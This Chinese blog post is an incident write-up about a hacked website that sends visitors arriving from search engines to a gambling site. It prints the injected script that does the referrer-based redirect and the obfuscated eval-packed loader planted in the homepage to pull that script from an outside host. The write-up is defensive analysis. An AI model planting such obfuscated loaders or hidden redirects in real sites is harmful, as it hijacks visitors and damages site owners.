记一次站点被挂马问题排查

简介: 起因,在下班准备回家之际,收到几条朋友发来的信息,说他的网站在百度搜索做信息流广告推广,但是从百度搜索点击打开就会跳转的博彩网站,让我帮忙排查下问题,是不是被挂马了,于是乎就开始了后面的故事为了保护网站隐私,假定网站地址是:http://www.

起因,在下班准备回家之际,收到几条朋友发来的信息,说他的网站在百度搜索做信息流广告推广,但是从百度搜索点击打开就会跳转的博彩网站,让我帮忙排查下问题,是不是被挂马了,于是乎就开始了后面的故事


为了保护网站隐私,假定网站地址是:http://www.xxx.com

收到消息后我尝试操作并收集到下面现象内容:

现象1:通过域名直接打开网站,可以正常打开,不会跳转到博彩站
现象2:通过百度/搜狗搜索引擎,搜索到网站后点击打开就会跳转到博彩站


开始排查

  • 网站是怎么跳转的?

网站跳转无非就是这两种:服务端重定向跳转/前端JS触发跳转,我开始用Charles抓包,列出抓包请求发起顺序大概是这样的(省略无关的请求):

  1. http://www.xxx.com
  2. https://www.cpdas8.com/cxc.js
  3. https://www.das8cx.com/ [博彩站]

先打开站点www.xxx.com返回Code=200,不是服务端重定向Code=302,是由前端发起跳转,并且注意到:cxc.js,请求头Referer=www.xxx.com,这个并非站点前端开发需要引入的脚本,打开地址看代码如下:


(function () {
    /*百度推送代码*/
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
     /*360推送代码*/
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"><\/script>');
     })();

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://www.das8cx.com/\";");
document.writeln("</script>");

看代码就知道抓到了元凶,这里执行了location.href到博彩站,但是看主页html源码里并没有cxc.js的引入,继续后面的排查


  • cxc.js是如何在主页里引入的?

带着这个疑问,打开了首页源码,大概过了下,没有发现引入脚本的地方,就开始怀疑是不是动态引入的,再次查看源码,看到一段被混淆加密压缩过代码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))

感觉事蹊跷,不管三七二十一先到谷歌开发者工具控制台里执行看看,截取重要提示信息:

A parser-blocking, cross site (i.e. different eTLD+1) script,https://www.cpdas8.com/cxc.js, is invoked via document.write

img_74950bc6511af294d9d903c06c4a6221.png
image

明了了,就是这段脚本把cxc.js动态的引入到站点里,现在跳转的原因是找到了,但是为啥会好端端的多了这段代码,继续后面的分析


  • 为什么主页源码会被篡改加入了一段脚本呢?

站点是通过阿里云服务器的虚拟空间进行部署的,服务器本身应该没有问题
目前猜测有两种可能性:

  1. FTP暴力破解,成功连接上FTP后进行篡改
  2. 站点安全漏洞,被上传了木马程序后被执行,篡改了源码

后面问了下FTP密码是设置的挺简单的,所以评估可能是FTP暴力破解导致,细思极恐


番外,里面还有段篡改SEO关键词代码,这里也需要去掉:
篡改了keyword/description/title

img_9786717d217bd87bb608e7d30b720b16.png
image


问题总结:

通过抓包和代码分析可以知道跳转到博彩站的流程是这样的:

  1. 打开首页,脚本执行了evel(混淆加密压缩),动态引入cxc.js
  2. 引入的cxc.js里执行了(function (){/* 跳转逻辑 */})(),如果站点referrer是搜索引擎过来的就跳转到博彩站,不是就不做跳转直接正常打开站点
  3. 知道原理后就很清晰明白上面现象的原因,并且可以很清楚的怎么去修复

站点源码被侵入篡改问题:

  • 站点的开发需要注意WEB安全问题,文件上传漏洞,脚本注入,SQL注入,跨站攻击,等
  • 站点的服务器/FTP/后台账号密码,不要设置的太随意,要有一定的复杂度,不然很容易被暴力破解

辅助手段-网站安全检测:


阅读原文地址

目录
相关文章
|
安全 网络安全 开发者
网站跳转到反诈中心该怎么处理解封恢复正常访问
作为一个网站开发者,我曾经经历了这样的情况:我建设的公司网站被标识为恶意网站,被拦截了。通过调查,我发现这是因为反诈中心下发了拦截令。这种拦截方法为网站域名拦截,即由最高部门下发到各地防诈中心和运营商进行拦截。如果用户打开这样的网站,将会出现解析错误,无法访问。总的来说,网站域名拦截是一种阻断诈骗网站的有效手段,但是在实际操作中也需要更加严格的审核,以防止出现误判的情况。我认为,反诈工作是需要不断提高的,同时也需要更加完善的机制和法律支持。
5375 0
网站跳转到反诈中心该怎么处理解封恢复正常访问
|
19天前
|
运维 监控 安全
服务器问题解析
服务器运营面临五大挑战:宕机、安全性问题、性能下降、数据备份恢复和网络问题。预防宕机需维护硬件、软件及备份;保障安全需强密码、安全补丁和防火墙;应对性能下降需监控分析并优化;数据备份要定期且完整;网络问题需与管理员合作解决。作为管理员,持续学习和改进以确保服务器稳定和数据安全。
|
2月前
|
网络安全 Nacos Docker
【Bug解决】1、Nacos启动成功,但却无法访问(提示:无法访问此网站,192.168.10.133的响应时间过长)
【Bug解决】1、Nacos启动成功,但却无法访问(提示:无法访问此网站,192.168.10.133的响应时间过长)
551 1
|
6月前
|
NoSQL Java Redis
服务器异常问题总结
服务器异常问题总结
35 0
|
运维 监控
|
前端开发
给网站“挂”上灯笼
给网站“挂”上灯笼
51 0
|
前端开发 数据可视化 JavaScript
《全栈导航》网站挂掉-我是如何排查问题
《全栈导航》网站挂掉-我是如何排查问题
259 0
《全栈导航》网站挂掉-我是如何排查问题
|
PHP Perl 测试技术
记一次织梦程序访问缓慢问题排查
近期接到几个关于织梦程序访问缓慢的case,有首页缓慢的也有后台生成首页缓慢的。本文记录一下关于这个case排查的过程。
1515 0
|
安全 程序员 PHP
如何修复网站漏洞Discuz被挂马 快照被劫持跳转该如何处理
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2、X3.3来,最稳定的社区论坛系统。目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理员的账号里去。
2233 0